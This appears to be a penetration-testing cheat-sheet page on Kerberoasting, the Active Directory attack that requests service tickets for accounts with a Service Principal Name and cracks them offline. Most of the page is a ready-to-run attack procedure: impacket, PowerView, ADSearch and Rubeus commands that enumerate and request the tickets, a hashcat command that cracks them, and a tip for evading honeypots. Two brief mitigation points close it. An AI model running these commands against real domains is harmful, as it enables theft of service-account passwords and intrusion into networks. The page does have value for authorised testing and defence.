Kerberoasting

Table of contents

  1. Vulnerability
  2. Prerequisites
  3. Exploit
  4. Recommendations

Vulnerability

This attack focuses on domain service accounts that have a Service Principal Name (SPN) associated. With this attribute, it’s possible to legitimately request a Kerberos Ticket Granting Service (TGS) as an authenticated user on the domain.

Kerberos service tickets contain a key used by the protocol to encrypt the session. This key is encrypted with the service account’s password hash. Kerberoasting consist in cracking the hash of the service account.

Prerequisites

  • Low privileged domain account.
  • Target must be a domain account with a Service Principal Name (SPN) associated.

Exploit

First, identify a domain user with a SPN. You can list Kerberoastable users in multiple ways like below.

# From Kali.
sudo impacket-GetUserSPNs -dc-ip $dc_ip $domain/$username:$password

# From a domain joined computer with PowerView.
Get-NetUser -SPN

# From a domain joined computer with ActiveDirectory PowerShell module.
Get-ADUSer -Filter { ServicePrincipalName -ne "$null" } -Properties ServicePrincipalName

# With ADSearch.
ADSearch.exe --search "(&(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName

Following commands will request a TGS-REP for all Kerberoastable accounts. Hashes are then stored into the specified output file.

# From Kali.
sudo impacket-GetUserSPNs -request -dc-ip $dc_ip $domain/$username:$password

# From a domain joined computer.
.\Rubeus.exe kerberoast /outfile:kerberoast.out

# From a Windows computer not joined to the domain.
.\Rubeus.exe kerberoast /creduser:$domain\$username /credpassword:$password /domain:$domain /dc:$dc_ip /outfile:kerberost.out

If you want to be more stealthy and avoid honey pots, request one user at the time. For instance, with Rubeus, add /user:$target option.

Then, use hashcat to crack retrieved TGS-REP hashes.

sudo hashcat -m 13100 kerberoast.out /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Recommendations

  • Remove Service Principal Name (SPN) from domain users when it’s possible.
  • If removing SPN is not possible, enforce strong password for involved domain users so it makes it hard - even impossible - to crack them.